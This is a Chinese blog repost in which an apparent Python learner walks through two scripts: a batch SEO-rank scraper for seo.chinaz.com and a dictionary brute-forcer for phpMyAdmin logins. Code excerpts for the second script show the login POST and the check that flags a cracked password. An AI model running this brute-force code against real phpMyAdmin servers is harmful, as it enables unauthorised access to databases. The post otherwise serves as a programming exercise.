2. 程式人生 > >Python爬蟲加爆破指令碼!會出現什麼樣的情況?砰,火花四濺!

Python爬蟲加爆破指令碼!會出現什麼樣的情況?砰,火花四濺!

阿新 發佈:2018-11-19

Python爬蟲加爆破指令碼!會出現什麼樣的情況?砰,火花四濺!

 

Python學習記錄指令碼,想通過練習編寫指令碼一點點提升自己很菜的程式設計水平~~明天會更好,希望自己越來越強吧。

批量檢測域名SEO相關資訊

專案地址

GitHub - sqlsec/seo: Python實現批量查詢網站的百度權重以及收錄情況。

實現原理

Python3 實現批量查詢網站的百度權重以及收錄情況,利用的是站長之家的SEO查詢介面,所以本指令碼相當於是一個爬蟲,用來批量提取資料資訊。

Python爬蟲加爆破指令碼!會出現什麼樣的情況?砰,火花四濺!

 

進群:548377875   即可獲取數十套PDF以及大量的學習資料!

模組相關

argparse

argparse 輕鬆編寫使用者友好的命令列介面。定義並解析了需要的引數。當用戶給程式提供無效引數時,該模組還會自動生成幫助和使用訊息併發出錯誤。

效果演示

Python爬蟲加爆破指令碼!會出現什麼樣的情況?砰,火花四濺!

 

progressbar

一個方便友好的進度條顯示模組。

效果演示

Python爬蟲加爆破指令碼!會出現什麼樣的情況?砰,火花四濺!

 

prettytable

一個表格輸出美化模組,展示結果很友好。

效果演示

Python爬蟲加爆破指令碼!會出現什麼樣的情況?砰,火花四濺!

 

相關程式碼解析

request請求程式碼

f = open(args.read,"r")
 lines = ''.join(f.readlines()).split("
")
 tb = pt.PrettyTable(["域名","百度權重","百度收錄","站點標題","域名年齡"])
 p = progressbar.ProgressBar()
 for domain in p(lines):
 url = 'http://seo.chinaz.com/{domain}'.format(domain=domain)
 headers = {
 'Host': 'seo.chinaz.com',
 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0',
 'Content-Type': 'application/x-www-form-urlencoded',
 }
 data = 'm=&host={domain}'.format(domain=domain)
 try:
 response = requests.post(url=url,headers=headers,data=data,timeout=10)
html = response.text

正則相關

# 百度權重正則
baidu_pattern = re.compile(r'baiduapp/(.*?).gif')
baidu = baidu_pattern.findall(html)[0]
# 收錄數量正則
count_pattern = re.compile(r'"Ma01LiRow w12-1 ">(.*?)</div>')
count = count_pattern.findall(html)[4]
# 站點標題正則
domain_name = re.compile(r'class="ball">(.*?)</div>')
name = domain_name.findall(html)[0]
# 域名年齡正則
domain_year = re.compile(r'wd={domain}" target="_blank">(.*?)</a>'.format(domain=domain))
year = domain_year.findall(html)[1]

PHPMyAdmin爆破

專案地址

GitHub - sqlsec/CreakPHPMyAdmin: Python實現掛載字典爆破PHPMyAdmin,雖然目前速度不是很快,但還是可以使用的。

實現原理

從字典檔案裡面讀取每行的密碼資訊帶入 requests 請求中實現密碼爆破的效果。 本指令碼測試 PHPMyAdmin 版本是 PHPStudy 自帶的版本。

模組相關

colorama

colorama 是一個 python 專門用來在控制檯、命令列輸出彩色文字的模組,可以跨平臺使用。

效果演示

Python爬蟲加爆破指令碼!會出現什麼樣的情況?砰,火花四濺!

 

optparse

一個已經被 argparse 替代的命令列引數編寫模組,建議搭建轉到 argparse ,這個模組不建議學習使用了,我當初因為不知道 argparse 的存在才用了這個模組的。

相關程式碼解析

request請求程式碼

def req(url,username,password):
 headers = {
 'Content-Type':'application/x-www-form-urlencoded',
 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
 }
 payload = {
 'pma_username':'{}'.format(username),
 'pma_password':'{}'.format(password),
 'server':'1',
 }
 res = requests.post(url,data=payload,headers=headers)
 return res

正則相關

正則匹配輸入密碼後的頁面返回結果來判斷是否爆破成功。

try:
 res = req(args.url,args.username,password)
 login_success = re.compile(r'opendb_url')
 success = login_success.search(res.text)
 if success:
 flag = True
 print(Fore.GREEN + "
[+] PHPMyAdmin is vulerable")
 print("Phpmyadin password is " + password)
 break 
except Exception as e:
 print(Fore.YELLOW + '執行異常{}'.format(e))

相關推薦

Python爬蟲爆破指令碼出現什麼樣的情況火花

  Python學習記錄指令碼,想通過練習編寫指令碼一點點提升自己很菜的程式設計水平~~明天會更好,希望自己越來越強吧。 批量檢測域名SEO相關資訊 專案地址 GitHub - sqlsec/seo: Python實現批量查詢網站的百度權重以及收錄情況。 實現原理

Python爬蟲的法律邊界(二)小爬怡情大爬over

view 去年 大眾點評 項目 工具 挖掘 web服務器 多網站 use 數據抓取的門檻越來越低,會點程序,或使用網絡工具都可以薅點數據,新入行了不少爬蟲選手,但是對抓取使用數據的法律風險可能缺少認識。尤其是從去年的《網絡安全法》實施開始,被新聞公開報道的相關法律訴訟已有

Python爬蟲為何可以這麽叼?爬取百度雲盤資源並保存到自己雲盤

源碼下載 表達 har .cn bdb 裏的 image AC 賬號登錄 點擊它,再點擊右邊的【Cookies】就可以看到請求頭裏的 cookie 情況。 cookie分析 除了上面說到的兩個 cookie ,其他的請求頭參數可以參照手動轉存

你以為Python爬蟲只能爬取網頁資料嗎?APP也是可以的呢

摘要 大多數APP裡面返回的是json格式資料,或者一堆加密過的資料 。這裡以超級課程表APP為例,抓取超級課程表裡使用者發的話題。 1 抓取APP資料包 方法詳細可以參考這篇博文:http://my.oschina.net/jhao104/blog/605963 得到超級課程表

2018-2019年世界將出現一場經濟危機危機過後中國將崛起

2018-2019年世界將會出現一場經濟危機,危機過後中國將會崛起! 2017-12-31   鐵捻山   閱 283029  轉 628 轉藏到我的圖書館 &

python官方下載一般出現好幾個包都有什麼區別呢?

第一次下載python,開啟官網,找到windows版本,發現裡面有好幾個包,查了一下幾個包的含義,不知道選哪個,在這裡記錄一下。一、輸入python ,找到官網,點選進去二、點選Downloads,選擇需要下載的版本,我這邊先擇的是windows版本三、選擇你需要下載的版本

Python爬蟲新手教程:爬取了6574篇文章告訴你產品經理在看什麼

作為網際網路界的兩個對立的物種,產品汪與程式猿似乎就像一對天生的死對頭;但是在產品開發鏈條上緊密合作的雙方,只有通力合作,才能更好

老男孩教育每日一題-2017年5月9日-vim命令粘貼帶#號或註釋信息格式出現混亂情況怎麽辦

vim/vi粘貼 每日一題 格式混亂 1.題目老男孩教育每日一題-2017年5月9日-vim編輯器使用知識點:vim命令粘貼帶#號或註釋信息格式會出現混亂情況,有什麽方法進行解決?問題說明:每次復制代碼時,如果代碼裏有 //或# 這樣的註釋就容易讓格式亂掉,顯示的內容不整齊,並不是所期望的顯示格式

IIS7錯誤:不能在此路徑中使用此配置節。如果在父級別上鎖定了該節便出現這種情況。鎖定是默認設置的(overrideModeDefault="Deny")......

命令 hand .exe ... 註意 net 解決 節點 windows IIS 7訪問的時候出現以下異常: 不能在此路徑中使用此配置節。如果在父級別上鎖定了該節,便會出現這種情況。鎖定是默認設置的(overrideModeDefault="Deny")...... 解決

Python入門、練手、視頻資源匯總拿走別客氣

知乎 stat 代理ip rip 1.3 mys 數據分析 for mnist 摘要:為方便朋友,重新整理匯總,內容包括長期必備、入門教程、練手項目、學習視頻。 一、長期必備。 1. StackOverflow,是疑難解答、bug排除必備網站,任何編程問題請第一時間到此

HTTP500.19 iis7、8 不能在此路徑中使用此配置節。如果在父級別上鎖定了該節,便出現這種情況

不能在此路徑中使用此配置節。如果在父級別上鎖定了該節,便會出現這種情況。鎖定 在全新安裝的IIS7下搭建網站,訪問頁面時出現錯誤資訊如下: 配置錯誤 不能在此路徑中使用此配置節。如果在父級別上鎖定了該節,便會出現這種情況。鎖定是預設設定的(overrideModeDefa

兩個執行緒同時呼叫一個函式出現什麼情況?

from: https://www.cnblogs.com/silentNight/p/5468805.html 最近在研究多執行緒,然後突然想到如果兩個執行緒同時訪問一個函式的話,要不要加鎖呢,加鎖怎麼加,不加又怎樣這樣的問題..然後去網上找了些帖子學習學習......

Android在手機的通知欄裡出現“XXX正在執行觸控即可瞭解詳情或停止應用”的訊息如何處理

手機上莫名顯示我們的app,“XXX正在執行,觸控即可瞭解詳情或停止應用”,我去,這不是讓使用者知道我們在後臺偷偷運行了,什麼情況?排查後發現是如下程式碼導致: startForeground(111,

vue 移動端頁面左右頁面切換效果(切換過程中出現白屏效果布吉島怎麼優化後來就釋出前就棄用了)

<transition name="left"> <router-view v-if="getCms" class="Router"/> </transition> data() { names: 'left' } watch: { '$route'(to,

vue 移動端頁面左右頁面切換效果(切換過程中出現白屏效果布吉島怎麽優化後來就發布前就棄用了)

names out name watch bsp etc () nsf his <transition name="left"> <router-view v-if="getCms" class="Router"/> </transition

客戶端提交資料給伺服器端如果資料中帶有中文的話有可能出現亂碼情況

request: 如果是GET方式 程式碼轉碼 String username = request.getParameter("username"); String password = request.getParameter("password"); String use

配置錯誤:不能在此路徑中使用此配置節。如果在父級別上鎖定了該節便出現這種情況

因為 IIS 7 採用了更安全的 web.config 管理機制,預設情況下會鎖住配置項不允許更改。 執行命令列 %windir%\system32\inetsrv\appcmd unlock config -section:system.webServer/handlers 。其中的 handl

HTTP500.19 iis7、8 不能在此路徑中使用此配置節。如果在父級別上鎖定了該節,便出現這種情況

不能在此路徑中使用此配置節。如果在父級別上鎖定了該節,便會出現這種情況。鎖定 在全新安裝的IIS7下搭建網站,訪問頁面時出現錯誤資訊如下: 配置錯誤 不能在此路徑中使用此配置節。如果在父級別上鎖定了該節,便會出現這種情況。鎖定是預設設定的(overrideModeDefa

IIS7錯誤:不能在此路徑中使用此配置節。如果在父級別上鎖定了該節便出現這種情況。鎖定是預設設定的

IIS 7訪問的時候出現以下異常: 不能在此路徑中使用此配置節。如果在父級別上鎖定了該節,便會出現這種情況。鎖定是預設設定的(overrideModeDefault="Deny")...... 解決方案: 因為 IIS 7 採用了更安全的 web.config 管理機制

面試中遇到的問題:一個指標重複釋放出現什麼情況

一個指標重複釋放會出現什麼情況? 我當時的回答是:1.空指標可以重複釋放 2.非空指標(可能大概)會報錯。 由於好幾天沒有寫程式碼,對指標有些生疏了,所以對非空指標的情況不太確定 。 所以剛才編寫了一個小程式碼進行了測試:#include <stdio.h> i